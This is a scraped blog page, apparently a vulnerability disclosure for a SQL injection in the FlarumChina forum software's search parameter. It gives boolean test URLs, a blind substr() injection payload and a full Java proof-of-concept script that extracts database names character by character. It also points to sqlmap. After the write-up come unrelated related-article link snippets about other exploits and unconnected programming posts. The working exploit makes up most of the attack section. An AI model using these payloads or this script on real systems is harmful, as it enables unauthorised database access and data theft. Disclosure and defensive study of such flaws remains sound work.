First,We need to download our vulnerable program in GitHub

links:https://github.com/skywalker512/FlarumChina/

Vulnerable versions: <= FlarumChina-beta.7C

When the build is completed, the following image will be displayed

So,The SQL Injection Vulnerability in Search Engine

You just need to visit the following links to make your judgment:

(1).http://127.0.0.1/?q=1%' and 1=1 --+

(2).http://127.0.0.1/?q=1%' and 1=2 --+

So, by returning the different pages mentioned above, we can see that there is a SQL injection vulnerability in this place.

Of course, I also wrote a script in Java to get the database name.

Although not perfect.

Principle:

http://localhost/?q=1%' and substr((select schema_name from information_schema.schemata limit 1,1),1,1)='f' --+

This link is returned when the page is normal.

So use this link to judge in my Java program

Java Poc:

 import java.io.BufferedReader;

 import java.io.FileReader;

 import java.io.IOException;

 import java.io.InputStreamReader;

 import java.net.MalformedURLException;

 import java.net.URL;

 import java.net.URLConnection;

 public class work {

     public static void main(String[] args) throws IOException {

         BufferedReader in = null;

         URL url = null;

         String str = null;

         for(int j=0;j<6;j++) {

             String bm=String.valueOf(j);

             System.out.print(bm+":");

             for (int i=1;i<25;i++) {

                 String cs=String.valueOf(i);

                 in = new BufferedReader(new FileReader("C:\\Users\\DELL\\Desktop\\superdic.txt"));

                 while((str = in.readLine()) != null) {

                     String urlPath = "http://localhost/?q=1%%27%20and%20substr((select%20schema_name%20from%20information_schema.schemata%20limit%20"+bm+",1),"+cs+",1)='"+str+"'%20--+";

                     try {

                         url = new URL(urlPath);

                     } catch (MalformedURLException e) {

                         System.out.println("error:"+cs);

                     }

                     URLConnection conn = url.openConnection();

                     conn.setDoInput(true);

                     BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()));

                     StringBuilder sb = new StringBuilder();

                     String line = null;

                     while((line = br.readLine()) != null) {

                         sb.append(line);

                     }

                     if(sb.indexOf("http://localhost/d/2") != -1) {

                         if("+".equals(str)) {

                             break;

                         }

                         System.out.print(str);

                         break;

                     }

                 }

                 if("+".equals(str)) {

                     break;

                 }

             }

             System.out.print("\n");

         }

         in.close();

     }

 }

Because I don't know how many databases there are, I'm going to run six for loops for the time being.

So the fifth line returned by the script does not have any output.

You can also use sqlmap directly to obtain of data.

Database:

But most websites are delayed, so script testing is recommended.

FlarumChina SQL injection Vulnerability的更多相关文章

  1. Cacti /graphs_new.php SQL Injection Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 other SQL injection vulnerability ...

  2. DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...

  3. Dede(织梦) CMS SQL Injection Vulnerability

    测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...

  4. MyBB 18 SQL Injection Vulnerability

    <?php error_reporting(0); ?> <form method="post" action=""> Input a ...

  5. Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  8. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  9. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

随机推荐

  1. 用nodejs做一下发送邮件例子

    var nodemailer = require("nodemailer"); var transport = nodemailer.createTransport("S ...

  2. 【转】理解*(void**)

    #include <stdio.h> int main() { int *p; ; unsigned ; p = &a; printf("%d\n", *p); ...

  3. eclipse自定义工具栏

    设置:1.Window2.Customize Perspective说明:Tool Bar Visibility定义菜单栏,Shortcuts定义右键new菜单

  4. memory_target

    ALTER SYSTEM SET MEMORY_TARGET = 33024M; ALTER SYSTEM SET MEMROY_MAX_TARGET= 33024M SCOPE=SPFILE; sh ...

  5. Centos6安装FreeSWITCH 1.5时./configure问题解决记录

    系统:Centos 6.4 64位: FreeSWITCH版本:1.5 具体的安装过程参考FreeSWITCH 官网wiki (也可以参考我的博客<Centos6安装FreeSWITCH> ...

  6. PHP CLI模式下的多进程应用

    作者: Laruence(   ) 本文地址: http://www.laruence.com/2009/06/11/930.html 转载请注明出处 PHP在很多时候不适合做常驻的SHELL进程, ...

  7. [PHP] 链表数据结构(单链表)

    链表:是一个有序的列表,但是它在内存中是分散存储的,使用链表可以解决类似约瑟夫问题,排序问题,搜索问题,广义表 单向链表,双向链表,环形链表 PHP的底层是C,当一个程序运行时,内存分成五个区(堆区, ...

  8. selenium自动化测试多条数据选择第一条

    如果我们测试时在一个页面中存在多条数据元素名称一致但是我们要选择第一条? 示意图: 方法一 driver.find_element_by_css_selector('.article-list/div ...

  9. icomet研究

    官方文档https://github.com/ideawu/icomet/wiki 如何实现的长连接:noop: 心跳消息+HTTP endless chunk 以班级ID为主键,进行班级通道的创建: ...

  10. 超实用!!!使用IDEA插件Alibaba Cloud Toolkit工具一键部署本地应用到ECS服务器

    最近看到阿里云发布了一款名为 Alibaba Cloud Toolkit 的插件,可以帮助开发者高效开发并部署适合在云端运行的应用,瞬间击中了我的小心脏,这个对于个人开发者来说超级棒啊,终于不需要再手 ...